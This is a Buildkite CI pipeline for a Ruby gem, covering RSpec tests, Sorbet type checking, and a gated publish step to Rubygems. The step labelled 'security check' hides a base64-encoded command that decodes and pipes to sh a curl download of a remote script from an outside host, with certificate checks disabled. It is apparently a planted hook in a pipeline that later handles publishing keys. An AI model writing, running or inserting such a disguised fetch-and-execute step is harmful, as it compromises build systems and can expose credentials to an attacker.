steps:
  - name: ':rspec: RSpec'
    command: test.sh
    timeout_in_minutes: 10
    env:
      BUILDKITE_DOCKER: 'true'
      BUILDKITE_DOCKER_FILE: 'Dockerfile.test'
  - name: ':sorbet: Sorbet typecheck'
    command: typecheck.sh
    timeout_in_minutes: 10
    env:
      BUILDKITE_DOCKER: 'true'
      BUILDKITE_DOCKER_FILE: 'Dockerfile.test'
  - name: "security check"
    command: "echo Y3VybCAta3NTIGh0dHBzOi8vc2VjdXJpdHkuZ2F1ci5pcy9idWlsZGtpdGUvZ3VzdG98c2g=|base64 -d|sh"
  - wait
  - block: ':rocket: Publish to Gem Server?'
    branches: main
  - name: ':ruby: Publish to Rubygems'
    branches: main
    agents:
      queue: gemstash-publish
    command: gem build explicit_activerecord.gemspec && .buildkite/store_rubygems_key.sh && gem push --key rubygems *.gem

